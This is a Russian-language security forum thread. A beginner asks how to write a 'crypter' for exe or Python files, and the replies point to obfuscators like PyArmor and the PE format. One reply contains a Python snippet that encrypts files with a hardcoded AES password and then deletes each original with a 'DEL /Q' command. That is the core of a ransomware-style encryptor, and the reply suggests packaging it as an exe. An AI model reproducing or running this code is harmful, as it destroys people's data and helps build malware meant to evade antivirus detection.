• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Криптор на python

QWW

New member
14.10.2020
1
0
BIT
0
Как написать криптор exe файлов или кода py на python

Объясните для чайника
 

brun0

Green Team
17.10.2020
23
50
BIT
0
Я как раз недавно писал нечто подобное. Выбор велик и вам не обязательно так говнокодить, как это сделал я, но с кодом можешь ознакомиться, конечно.

Python:
import os
import pyAesCrypt # Основная штуковина для шифрования, жутко простой модуль

def crypt(): #Функция шифрации файлов

    global list
    global counter

    password = '8949821812876327517298129983712381538913871237126378'
    bufferSize = 512*1024
    pyAesCrypt.encryptFile(str(list[counter]), str(list[counter])+'.aes', password, bufferSize) #Лист здесь выбивает название файла, там я делал функцию перебора файлов в директории
    print('[Crypted]'+str(list[counter])+'.aes')
    os.system('DEL /Q ' + str(list[counter])) #Тут может быть ошибка, посокльку я не гребу, какие там команды в cmd на винде. Удаляет оригинальный файл
Там еще много чего можно дописать, но основная функция шифрования вот.
#UPD: В exe можешь его запихнуть с помощью компилятора pyinstaller, в гугле полно гайдов.
 
Последнее редактирование:

Pernat1y

Red Team
05.04.2018
1 443
135
BIT
0
Для скриптовых языков (в том числе и для Python), это называется обфускатор. С сорцами есть, например, PyArmor.
Касательно крипта exe - либо учи формат PE и то, как работают загрузчики и основы ассемблера, либо сразу забей. "Для чайников" тут не прокатит.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!